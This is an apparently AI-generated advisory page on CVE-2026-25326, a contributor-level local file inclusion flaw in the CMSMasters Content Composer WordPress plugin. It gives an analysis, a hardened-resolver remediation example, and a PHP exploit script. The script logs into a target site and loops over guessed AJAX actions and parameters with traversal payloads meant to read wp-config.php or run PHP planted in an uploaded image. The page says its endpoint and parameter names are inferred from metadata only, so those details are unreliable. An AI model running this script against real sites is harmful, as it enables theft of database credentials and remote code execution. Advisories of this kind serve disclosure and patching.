Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-25326: CMSMasters Content Composer <= 1.4.5 – Authenticated (Contributor+) Local File Inclusion (cmsmasters-content-composer)

Severity: High (CVSS 7.5)
CWE: 98
Vulnerable Version: 1.4.5
Patched Version:
Disclosed: February 1, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25326 (metadata-based):
The CMSMasters Content Composer plugin for WordPress versions up to and including 1.4.5 contains an authenticated local file inclusion vulnerability. Attackers with contributor-level permissions or higher can exploit this flaw to include and execute arbitrary files on the server. This vulnerability affects the plugin’s file inclusion mechanism, leading to potential remote code execution.

CWE-98 indicates improper control of filename arguments in PHP include/require statements. The vulnerability description confirms attackers can include arbitrary files, including uploaded images and other ‘safe’ file types containing PHP code. Atomic Edge research infers the plugin likely passes user-controlled input directly to PHP file inclusion functions without proper validation. This conclusion is based on the CWE classification and the described exploitation method. No source code confirmation is available.

Exploitation requires contributor-level authentication. Attackers would identify a vulnerable endpoint that accepts a file path parameter. They would then supply a path traversal payload to include local files containing PHP code. A common WordPress pattern involves AJAX handlers with actions like ‘cmsmasters_content_composer_action’ or similar. Attackers could upload an image with embedded PHP code via WordPress media uploads, then use the LFI vulnerability to include that file. The payload might resemble ‘../../../../uploads/2025/02/malicious.jpg’ or similar directory traversal sequences.

Remediation requires implementing strict validation on all file path parameters. The patched version likely added allowlisting of permitted file paths or basenames. Proper sanitization should remove directory traversal sequences like ‘../’. The fix should also verify file extensions against an allowlist and ensure included files reside within expected plugin directories. WordPress security best practices recommend using plugin_dir_path() or similar functions to construct safe absolute paths.
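
The inferred inclusion pattern and the remediation described above, as an added example. It is not the plugin's code, which the analysis did not have. The function names, the template slug and the directory layout are hypothetical, and in a plugin the base directory would be built with plugin_dir_path(). The hardened resolver treats the request value as a key into an allowlist and confirms the resolved path stays inside the base directory, rather than relying on stripping ‘../’.

```php
<?php
// Added example; every name here (functions, slugs, directories) is hypothetical.

/** Vulnerable pattern (CWE-98): the request value is joined to the base directory as-is. */
function resolve_unsafe(string $base, string $requested): string
{
    return $base . '/' . $requested;   // "../" segments walk out of $base
}

/** Hardened: the request value only selects an allowlisted file that must resolve inside $base. */
function resolve_safe(string $base, string $requested, array $allowlist): ?string
{
    if (!isset($allowlist[$requested])) {
        return null;                   // unknown slug: request data never reaches the filesystem
    }
    $baseReal = realpath($base);
    $fileReal = realpath($base . '/' . $allowlist[$requested]);
    if ($baseReal === false || $fileReal === false) {
        return null;                   // missing directory or file
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    if (strncmp($fileReal, $prefix, strlen($prefix)) !== 0) {
        return null;                   // a symlink or bad allowlist entry resolved outside $base
    }
    return pathinfo($fileReal, PATHINFO_EXTENSION) === 'php' ? $fileReal : null;
}

// Constructed sample tree: one plugin template and one uploaded image.
$root = sys_get_temp_dir() . '/lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/plugin/templates', 0700, true);
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/plugin/templates/card.php', "<?php echo 'card';\n");
file_put_contents($root . '/uploads/photo.jpg', 'constructed image bytes');

$base      = $root . '/plugin/templates';   // in WordPress: plugin_dir_path(__FILE__) . 'templates'
$allowlist = ['card' => 'card.php'];        // slug => file shipped with the plugin

foreach (['card', '../../uploads/photo.jpg', 'card.php'] as $input) {
    $unsafe  = realpath(resolve_unsafe($base, $input));
    $escaped = $unsafe !== false && strpos($unsafe, realpath($base) . DIRECTORY_SEPARATOR) !== 0;
    $safe    = resolve_safe($base, $input, $allowlist);
    printf("%-26s unsafe: %-18s safe: %s\n", $input,
        $unsafe === false ? 'no such file' : ($escaped ? 'ESCAPES base dir' : 'inside base dir'),
        $safe === null ? 'rejected' : basename($safe));
}

array_map('unlink', [$base . '/card.php', $root . '/uploads/photo.jpg']);
array_map('rmdir', [$base, $root . '/plugin', $root . '/uploads', $root]);
```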

Successful exploitation leads to arbitrary PHP code execution on the target server. Attackers can bypass access controls, access sensitive data, and establish persistent backdoors. The CVSS vector indicates high impacts on confidentiality, integrity, and availability with low attack complexity. This vulnerability enables privilege escalation from contributor to administrator capabilities through code execution. Attackers could compromise the entire WordPress installation and underlying server.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-25326 - CMSMasters Content Composer <= 1.4.5 - Authenticated (Contributor+) Local File Inclusion
/**
 * Proof of Concept for CVE-2026-25326
 * Assumptions based on metadata analysis:
 * 1. Vulnerable endpoint is likely /wp-admin/admin-ajax.php
 * 2. Action parameter contains 'cmsmasters_content_composer' or similar
 * 3. File inclusion parameter accepts path traversal
 * 4. Contributor authentication required
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// First, authenticate and obtain WordPress cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Create temporary cookie file
$cookie_file = tempnam(sys_get_temp_dir(), 'wp_cookie_');

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/x-www-form-urlencoded',
        'User-Agent: Atomic-Edge-PoC/1.0'
    ]
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200 || strpos($response, 'Dashboard') === false) {
    echo "Authentication failed. Check credentials.\n";
    unlink($cookie_file);
    exit(1);
}

echo "Authentication successful. Proceeding with exploitation attempt.\n";

// Attempt exploitation via AJAX endpoint
// Based on plugin slug, likely action parameter values
$possible_actions = [
    'cmsmasters_content_composer_action',
    'content_composer_action',
    'cmsmasters_composer_action',
    'cmsmasters_ajax_action'
];

// Common file inclusion parameter names
$possible_params = [
    'file',
    'path',
    'include',
    'template',
    'view',
    'partial'
];

// Test payload - attempt to include wp-config.php
$payloads = [
    '../../../../wp-config.php',
    '../../../wp-config.php',
    'wp-config.php',
    '../../uploads/2025/02/malicious.jpg' // If attacker uploaded PHP in image
];

$exploited = false;

foreach ($possible_actions as $action) {
    foreach ($possible_params as $param) {
        foreach ($payloads as $payload) {
            curl_setopt_array($ch, [
                CURLOPT_URL => $ajax_url,
                CURLOPT_POSTFIELDS => http_build_query([
                    'action' => $action,
                    $param => $payload,
                    '_wpnonce' => 'test' // Nonce may not be required due to vulnerability
                ]),
                CURLOPT_COOKIEFILE => $cookie_file
            ]);
            
            $response = curl_exec($ch);
            
            // Check for indicators of successful inclusion
            if (strpos($response, 'DB_NAME') !== false || 
                strpos($response, 'define') !== false ||
                strpos($response, '<?php') !== false) {
                echo "Potential success! Action: $action, Param: $param, Payload: $payload\n";
                echo "Response snippet: " . substr($response, 0, 200) . "...\n";
                $exploited = true;
                break 3;
            }
        }
    }
}

if (!$exploited) {
    echo "Exploitation attempt completed. No clear success indicators found.\n";
    echo "Note: Actual parameters may differ. Manual testing with Burp may be required.\n";
}

// Cleanup
curl_close($ch);
unlink($cookie_file);

?>
